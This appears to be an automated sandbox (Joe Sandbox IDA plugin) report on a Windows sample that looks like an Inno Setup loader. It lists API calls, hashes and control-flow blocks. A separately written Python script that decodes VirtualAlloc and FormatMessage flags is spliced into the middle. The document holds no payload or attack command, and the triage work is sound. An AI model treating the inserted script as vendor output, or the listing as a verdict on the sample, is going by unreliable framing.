                                                                          • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                          • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                          • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                          • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
• SetWindowLongA.USER32(00020420,000000FC,004097FC), ref: 0040A027
  • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
  • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
  • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
  • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
  • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
  • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
• RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
• 73A25CF0.USER32(00020420,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 978128352-3001827809
• Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
• Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
• Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
• Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02072BFC), ref: 00409484
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
• SetWindowLongA.USER32(00020420,000000FC,004097FC), ref: 0040A027
  • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
  • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
  • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
  • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
  • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
  • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
• RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
• 73A25CF0.USER32(00020420,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 240127915-3001827809
• Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
• Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
• Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
• Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
• CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
• GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
• CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
  • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02072BFC), ref: 00409484
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
• String ID: D
• API String ID: 3356880605-2746444292
• Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
• Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
• Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
• Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Message
• String ID: $u@$.tmp
• API String ID: 2030045667-236237750
• Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
• Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
• Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
• Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Message
• String ID: $u@$.tmp
• API String ID: 2030045667-236237750
• Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
• Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
• Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
• Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
• Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
• Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
• Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406F0A
• LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
• Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
• Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
• Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
• GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
  • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
• Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
• Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
• Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
Memory Dump Source
• Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
• Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
• Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
• Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B
Uniqueness

Uniqueness Score: -1.00%

                                                                           Control-flow Graph

                                                                           Blocks: 326 (407524-407545, SetFilePointer); 327 (407557-407559); 328 (407547-40754e, GetLastError); 329 (407550-407552, call 4073ec)
                                                                           Edges: 326->327, 326->328, 328->327, 328->329, 329->327
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                          • Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
                                                                          • Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                          • Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                           Control-flow Graph

                                                                           Blocks: 331 (401430-40143d); 332 (401446-40144c); 333 (40143f-401444); 334 (401452-40146a, VirtualAlloc); 335 (40146c-40147a, call 4012e4); 336 (40148f-401492); 339 (40147c-40148d, VirtualFree)
                                                                           Edges: 331->332, 331->333, 332->334, 333->334, 334->335, 334->336, 335->336, 335->339, 339->336
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
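The VirtualAlloc/VirtualFree and FormatMessageA records in these listings give their flag arguments as raw hex (00002000, 00000001, 00008000, 00003200), which is the detail a triager actually wants to read symbolically: the allocation at 0040145F reserves with PAGE_NOACCESS, the one at 00407E8C commits PAGE_READWRITE, and neither asks for a writable-and-executable page. The following script is an added example, not Joe Sandbox code and not part of this report: it parses `Api.MODULE(args), ref: ADDR` lines of the form shown on this page (the sample records are copied from the listings above), decodes the flag words using the Win32 constant values from winnt.h/winbase.h, and flags any call that requests PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. It generalizes beyond the page by also handling VirtualAllocEx and VirtualProtect, which do not occur in these records; the function names parse_report, decode_call and writable_executable are chosen here.

```python
"""Decode flag arguments in Joe Sandbox "APIs" records (added example, not Joe Sandbox code).

Record format and sample lines are taken from the report; Win32 constant values are
from winnt.h / winbase.h. Only arguments the report resolved to 8-digit hex are decoded;
'?' and string arguments are kept as unknown.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

MEM_FLAGS = {
    0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE",
    0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES",
}
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY", 0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
FMT_FLAGS = {
    0x100: "FORMAT_MESSAGE_ALLOCATE_BUFFER", 0x200: "FORMAT_MESSAGE_IGNORE_INSERTS",
    0x400: "FORMAT_MESSAGE_FROM_STRING", 0x800: "FORMAT_MESSAGE_FROM_HMODULE",
    0x1000: "FORMAT_MESSAGE_FROM_SYSTEM", 0x2000: "FORMAT_MESSAGE_ARGUMENT_ARRAY",
}
# Zero-based argument position of each flag word, in Win32 parameter order.
DECODERS = {
    "VirtualAlloc":   {2: ("flAllocationType", MEM_FLAGS), 3: ("flProtect", PAGE_FLAGS)},
    "VirtualAllocEx": {3: ("flAllocationType", MEM_FLAGS), 4: ("flProtect", PAGE_FLAGS)},
    "VirtualFree":    {2: ("dwFreeType", MEM_FLAGS)},
    "VirtualProtect": {2: ("flNewProtect", PAGE_FLAGS)},
    "FormatMessageA": {0: ("dwFlags", FMT_FLAGS)},
    "FormatMessageW": {0: ("dwFlags", FMT_FLAGS)},
}
PROTECT_ARG = {"VirtualAlloc": 3, "VirtualAllocEx": 4, "VirtualProtect": 2}
WRITE_AND_EXEC = 0x40 | 0x80  # PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# "• Api.MODULE(arg,arg,...), ref: ADDR", optionally prefixed "Part of subcall function ADDR:"
RECORD = re.compile(
    r"^\s*\u2022?\s*(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
    r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    raw_args: List[str]
    args: List[Optional[int]]   # None where the report shows '?' or a string
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # enclosing function for "Part of subcall" records


def parse_record(line: str) -> Optional[ApiCall]:
    """Parse one record line; return None for any other line of the report."""
    m = RECORD.match(line)
    if not m:
        return None
    sub, api, module, arglist, ref = m.groups()
    raw = [a.strip() for a in arglist.split(",")] if arglist else []
    ints = [int(a, 16) if HEX8.match(a) else None for a in raw]
    return ApiCall(api, module, raw, ints, int(ref, 16), int(sub, 16) if sub else None)


def parse_report(text: str) -> List[ApiCall]:
    return [c for c in (parse_record(l) for l in text.splitlines()) if c]


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a flag word as NAME|NAME, lowest bit first; unknown bits stay hex at the end."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(bit for bit in table if value & bit)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"


def decode_call(call: ApiCall) -> Dict[str, str]:
    """Symbolic view of the flag arguments the report resolved for this call."""
    out = {}
    for pos, (name, table) in DECODERS.get(call.api, {}).items():
        if pos < len(call.args) and call.args[pos] is not None:
            out[name] = decode_flags(call.args[pos], table)
    return out


def writable_executable(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls whose requested page protection is both writable and executable."""
    hits = []
    for c in calls:
        pos = PROTECT_ARG.get(c.api)
        if pos is not None and pos < len(c.args) and c.args[pos] is not None \
                and c.args[pos] & WRITE_AND_EXEC:
            hits.append(c)
    return hits


# Sample records copied from this report's function listings.
SAMPLE_RECORDS = """\
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
  • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
"""

if __name__ == "__main__":
    calls = parse_report(SAMPLE_RECORDS)
    for c in calls:
        print(f"{c.ref:08X} {c.api:<16} {decode_call(c)}")
    print("write+exec pages requested:", [f"{c.ref:08X}" for c in writable_executable(calls)])
```

Run against the sample records it prints MEM_RESERVE/PAGE_NOACCESS for 0040145F, MEM_RELEASE for 00401486, FORMAT_MESSAGE_IGNORE_INSERTS|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_ARGUMENT_ARRAY for 00407203, MEM_COMMIT/PAGE_READWRITE for 00407E8C, and an empty write+exec list. Paste the "APIs" lines of a whole report into SAMPLE_RECORDS to find the functions that do request RWX pages; the report's own argument lists are longer than the Win32 prototypes because they include stack values, so positions are taken from the front.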

                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
                                                                            • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
                                                                            • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                          • Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
                                                                          • Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                          • Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                          • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
